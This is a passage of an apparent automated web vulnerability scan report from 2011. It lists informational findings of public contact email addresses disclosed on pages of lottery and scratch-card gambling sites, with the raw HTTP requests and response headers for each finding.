ETag: "683ef92c05accf8dc3002cfa2d153539"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/PrivacyPolicy.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /AboutUs/PrivacyPolicy.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...
<a href="mailto:info@postcodelottery.com" class="normal" title="mailto:info@postcodelottery.com">info@postcodelottery.com</a>
...[SNIP]...

21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/TermsAndConditions.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /AboutUs/TermsAndConditions.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:30 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...
<a href="mailto:info@postcodelottery.com" class="normal" title="mailto:info@postcodelottery.com">info@postcodelottery.com</a>
...[SNIP]...

21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /FunGames/PaidGames/PostcodeLotteryScratch.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.route1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 15840

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...
<a href="mailto:Support@pclscratch.com" class="normal" title="mailto:Support@pclscratch.com">Support@pclscratch.com</a>
...[SNIP]...

21.53. http://www.primegrattage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primegrattage.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:support@primegrattage.com">support@primegrattage.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.54. http://www.primescratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.primescratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29955
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OHLOLGNDBFFPCKPGPEBMNJLJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.55. http://www.primescratchcards.com/HelpDepositMethods.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28284
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.56. http://www.primescratchcards.com/InviteFriend.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26530
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.57. http://www.primescratchcards.com/Responsible.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23384
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:care@PrimeScratchCards.com">care@PrimeScratchCards.com</a>
...[SNIP]...
<a href="mailto:care@PrimeScratchCards.com">care@PrimeScratchCards.com </a>
...[SNIP]...

21.58. http://www.primescratchcards.com/SecurityAndPrivacy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.59. http://www.primescratchcards.com/aboutus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21887
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.60. http://www.primescratchcards.com/affiliates.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23594
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:affiliates@primepartners.com"><u>affiliates@primepartners.com</u>
...[SNIP]...

21.61. http://www.primescratchcards.com/contactus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25485
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.62. http://www.primescratchcards.com/fairplay.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22256
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.63. http://www.primescratchcards.com/help.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20735
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.64. http://www.primescratchcards.com/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29848
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:26 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.65. http://www.primescratchcards.com/media.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22031
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:marketing@primegaming.com">marketing@primegaming.com</a>
...[SNIP]...
<a href="mailto:pr@primegaming.com">pr@primegaming.com</a>
...[SNIP]...

21.66. http://www.primescratchcards.com/playersclub.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:VIP@primescratchcards.com">VIP@primescratchcards.com</a>
...[SNIP]...

21.67. http://www.primescratchcards.com/promotions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
